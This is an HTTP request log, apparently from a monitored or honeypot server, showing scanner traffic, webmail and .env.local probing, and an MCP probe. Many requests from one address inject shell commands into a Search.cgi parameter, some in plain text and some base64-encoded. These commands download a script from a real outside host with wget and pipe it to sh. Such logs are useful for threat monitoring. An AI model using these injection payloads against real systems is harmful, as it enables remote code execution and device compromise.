[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33417
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.4 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33415
Path: /rcmail/
URL: /rcmail/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15
Connection: close
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33411
Path: /rcube
URL: /rcube
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33405
Path: /rcube/
URL: /rcube/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/603.1.10 (KHTML, like Gecko) Version/10.1 Safari/603.1.10
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33385
Path: /mail/
URL: /mail/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/14.0
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33391
Path: /mail
URL: /mail
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:140.0.) Gecko/20100101 Firefox/140.0.
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33379
Path: /roundcube
URL: /roundcube
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33369
Path: /roundcube/
URL: /roundcube/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33359
Path: /webmail
URL: /webmail
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33351
Path: /webmail/
URL: /webmail/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
[2026-02-24 08:01:58] Main page accessed - IP: 5.101.157.136:33347
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Mobile/15E148 Safari/604.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33347
Path: /
URL: /
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
[2026-02-24 08:01:58] Main page accessed - IP: 5.101.157.136:33341
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33341
Path: /
URL: /
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43454
Path: /dispatch.asp
URL: /dispatch.asp
Method: GET
[2026-02-24 07:50:38] === HTTP Request ===
[2026-02-24 06:35:14] Main page accessed - IP: 147.185.132.249:64654
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.249:64654
Path: /
URL: /
Method: GET
[2026-02-24 06:35:14] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50001
Path: /.env.local
URL: /.env.local
Method: GET
[2026-02-24 06:13:32] === HTTP Request ===
[2026-02-24 05:43:01] Main page accessed - IP: 121.43.116.42:55904
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 121.43.116.42:55904
Path: /
URL: /
Method: GET
[2026-02-24 05:43:01] === HTTP Request ===
[2026-02-24 05:43:01] Main page accessed - IP: 121.43.116.42:55874
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.43.116.42:55874
Path: /
URL: /
Method: GET
[2026-02-24 05:43:01] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.116.42:54702
Path: /HNAP1
URL: /HNAP1
Method: GET
[2026-02-24 05:42:47] === HTTP Request ===
===================
Body: <soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
Content-Length: 441
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.116.42:54568
Path: /sdk
URL: /sdk
Method: POST
[2026-02-24 05:42:46] === HTTP Request ===
[2026-02-24 05:42:46] Main page accessed - IP: 121.43.116.42:54510
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.43.116.42:54510
Path: /
URL: /
Method: GET
[2026-02-24 05:42:46] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.116.42:54350
Path: /evox/about
URL: /evox/about
Method: GET
[2026-02-24 05:42:45] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.116.42:54308
Path: /nmaplowercheck1771911764
URL: /nmaplowercheck1771911764
Method: GET
[2026-02-24 05:42:45] === HTTP Request ===
[2026-02-24 05:42:45] Main page accessed - IP: 121.43.116.42:54302
===================
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; mcafee-epo-agent)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.116.42:54302
Path: /
URL: /
Method: GET
[2026-02-24 05:42:45] === HTTP Request ===
[2026-02-24 05:42:34] Main page accessed - IP: 121.43.116.42:53152
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.43.116.42:53152
Path: /
URL: /
Method: GET
[2026-02-24 05:42:34] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.136:46688
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-24 04:54:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.136:63006
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 04:53:09] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.136:62990
Path: *
URL: *
Method: PRI
[2026-02-24 04:53:06] === HTTP Request ===
[2026-02-24 04:53:06] Main page accessed - IP: 66.132.153.136:62980
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.136:62980
Path: /
URL: /
Method: GET
[2026-02-24 04:53:06] === HTTP Request ===
===================
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:49608
Path: /jars
URL: /jars
Method: GET
[2026-02-24 02:39:14] === HTTP Request ===
[2026-02-24 02:30:49] Main page accessed - IP: 205.210.31.246:55904
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.246:55904
Path: /
URL: /
Method: GET
[2026-02-24 02:30:49] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.1:42456
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 01:46:58] === HTTP Request ===
[2026-02-24 01:46:51] Main page accessed - IP: 85.217.140.1:42442
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.1:42442
Path: /
URL: /
Method: GET
[2026-02-24 01:46:51] === HTTP Request ===
[2026-02-24 01:46:03] Main page accessed - IP: 172.30.0.12:44746
===================
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 205.210.31.208
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44746
Path: /
URL: /
Method: GET
[2026-02-24 01:46:03] === HTTP Request ===
[2026-02-24 00:26:43] Main page accessed - IP: 176.65.139.8:38084
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.139.8:38084
Path: /
URL: /
Method: GET
[2026-02-24 00:26:43] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 71.6.134.232:35466
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 00:17:20] === HTTP Request ===
[2026-02-24 00:16:42] Main page accessed - IP: 71.6.134.232:58806
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 71.6.134.232:58806
Path: /
URL: /
Method: GET
[2026-02-24 00:16:42] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.128.93:53597
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-23 23:02:22] === HTTP Request ===
===================
User-Agent: python-httpx/0.28.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Sec-Fetch-Mode: cors
Content-Type: application/json
Accept-Language: *
Accept: application/json, text/event-stream
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.128.91:59342
Path: /sse
URL: /sse
Method: GET
[2026-02-23 23:02:22] === HTTP Request ===
===================
Body: {"jsonrpc":"2.0","id":7483728,"method":"initialize","params":{"protocolVersion":"2025-06-18","capabilities":{"sampling":{},"elicitation":{},"roots":{"listChanged":true}},"clientInfo":{"name":"gitmc-org-mcp-scanner","version":"1.0.0"}}}
Accept: application/json, text/event-stream
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept-Language: *
Sec-Fetch-Mode: cors
Content-Type: application/json
User-Agent: python-httpx/0.28.1
Content-Length: 235
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.128.91:59342
Path: /mcp
URL: /mcp
Method: POST
[2026-02-23 23:02:22] === HTTP Request ===
[2026-02-23 23:02:20] Main page accessed - IP: 45.156.128.91:40155
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.128.91:40155
Path: /
URL: /
Method: GET
[2026-02-23 23:02:20] === HTTP Request ===
[2026-02-23 22:29:17] Main page accessed - IP: 198.235.24.204:64554
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: defect.vulnberries.ru
RemoteAddr: 198.235.24.204:64554
Path: /
URL: /
Method: GET
[2026-02-23 22:29:17] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:45806
Query: action=cgi_query&username=x%3Bwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O-+%7C+sh+%26
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&username=x%3Bwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O-+%7C+sh+%26
Method: GET
[2026-02-23 20:40:22] === HTTP Request ===
[2026-02-23 20:40:06] Main page accessed - IP: 204.76.203.8:57924
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:57924
Path: /
URL: /
Method: GET
[2026-02-23 20:40:06] === HTTP Request ===
[2026-02-23 20:39:42] Main page accessed - IP: 147.185.132.150:61450
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: inventory.vulnberries.ru
RemoteAddr: 147.185.132.150:61450
Path: /
URL: /
Method: GET
[2026-02-23 20:39:42] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:55748
Query: action=cgi_query&username=x%24%28wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26%29
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&username=x%24%28wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26%29
Method: GET
[2026-02-23 20:33:26] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:55662
Query: action=cgi_query&queryb64str=eHx3Z2V0IGh0dHA6Ly80NS4xNDguMTIwLjIzL2JpbnMva2xhLnNoIC1PLSB8IHNoICY%3D
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&queryb64str=eHx3Z2V0IGh0dHA6Ly80NS4xNDguMTIwLjIzL2JpbnMva2xhLnNoIC1PLSB8IHNoICY%3D
Method: GET
[2026-02-23 20:33:21] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:47634
Query: action=cgi_query&username=x%7Cwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O-+%7C+sh+%26
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&username=x%7Cwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O-+%7C+sh+%26
Method: GET
[2026-02-23 20:33:15] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:50010
Query: action=cgi_query&queryb64str=eDt3Z2V0IGh0dHA6Ly80NS4xNDguMTIwLjIzL2JpbnMva2xhLnNoIC1PLSB8IHNoICY%3D
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&queryb64str=eDt3Z2V0IGh0dHA6Ly80NS4xNDguMTIwLjIzL2JpbnMva2xhLnNoIC1PLSB8IHNoICY%3D
Method: GET
[2026-02-23 20:33:08] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:49948
Query: action=cgi_query&username=x%3Bwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O-+%7C+sh+%26
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&username=x%3Bwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O-+%7C+sh+%26
Method: GET
[2026-02-23 20:33:02] === HTTP Request ===
[2026-02-23 20:32:57] Main page accessed - IP: 204.76.203.8:47844
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:47844
Path: /
URL: /
Method: GET
[2026-02-23 20:32:57] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:59892
Query: action=cgi_query&username=x%3Bwget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26
Path: /cgi-bin/Search.cgi
URL: /cgi-bin/Search.cgi?action=cgi_query&username=x%3Bwget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26
Method: GET
[2026-02-23 20:25:19] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:59832
Query: action=cgi_query&queryb64str=eCQod2dldCAtcU8tIGh0dHA6Ly80NS4xNDguMTIwLjIzL2JpbnMva2xhLnNoIDI%2BL2Rldi9udWxsfHNoIC1zIHNlY3JldCAmKQ%3D%3D
Path: /Search.cgi
URL: /Search.cgi?action=cgi_query&queryb64str=eCQod2dldCAtcU8tIGh0dHA6Ly80NS4xNDguMTIwLjIzL2JpbnMva2xhLnNoIDI%2BL2Rldi9udWxsfHNoIC1zIHNlY3JldCAmKQ%3D%3D
Method: GET
[2026-02-23 20:25:10] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:41480
Query: action=cgi_query&username=x%24%28wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26%29
Path: /Search.cgi
URL: /Search.cgi?action=cgi_query&username=x%24%28wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26%29
Method: GET
[2026-02-23 20:25:03] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:34774
Query: action=cgi_query&queryb64str=eHx3Z2V0IC1xTy0gaHR0cDovLzQ1LjE0OC4xMjAuMjMvYmlucy9rbGEuc2ggMj4vZGV2L251bGx8c2ggLXMgc2VjcmV0ICY%3D
Path: /Search.cgi
URL: /Search.cgi?action=cgi_query&queryb64str=eHx3Z2V0IC1xTy0gaHR0cDovLzQ1LjE0OC4xMjAuMjMvYmlucy9rbGEuc2ggMj4vZGV2L251bGx8c2ggLXMgc2VjcmV0ICY%3D
Method: GET
[2026-02-23 20:24:57] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:52408
Query: action=cgi_query&username=x%7Cwget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26
Path: /Search.cgi
URL: /Search.cgi?action=cgi_query&username=x%7Cwget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26
Method: GET
[2026-02-23 20:24:50] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:52376
Query: action=cgi_query&queryb64str=eDt3Z2V0IC1xTy0gaHR0cDovLzQ1LjE0OC4xMjAuMjMvYmlucy9rbGEuc2ggMj4vZGV2L251bGx8c2ggLXMgc2VjcmV0ICY%3D
Path: /Search.cgi
URL: /Search.cgi?action=cgi_query&queryb64str=eDt3Z2V0IC1xTy0gaHR0cDovLzQ1LjE0OC4xMjAuMjMvYmlucy9rbGEuc2ggMj4vZGV2L251bGx8c2ggLXMgc2VjcmV0ICY%3D
Method: GET
[2026-02-23 20:24:42] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:57150
Query: action=cgi_query&username=x%3Bwget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26
Path: /Search.cgi
URL: /Search.cgi?action=cgi_query&username=x%3Bwget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26
Method: GET
[2026-02-23 20:24:36] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:57100
Query: action=cgi_query&queryb64str=eCQod2dldCAtcU8tIGh0dHA6Ly80NS4xNDguMTIwLjIzL2JpbnMva2xhLnNoIDI%2BL2Rldi9udWxsfHNoIC1zIHNlY3JldCAmKQ%3D%3D
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&queryb64str=eCQod2dldCAtcU8tIGh0dHA6Ly80NS4xNDguMTIwLjIzL2JpbnMva2xhLnNoIDI%2BL2Rldi9udWxsfHNoIC1zIHNlY3JldCAmKQ%3D%3D
Method: GET
[2026-02-23 20:24:30] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:54540
Query: action=cgi_query&username=x%24%28wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26%29
Path: /cgi-bin/nobody/Search.cgi
URL: /cgi-bin/nobody/Search.cgi?action=cgi_query&username=x%24%28wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+secret+%26%29
Method: GET
[2026-02-23 20:24:24] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:54500
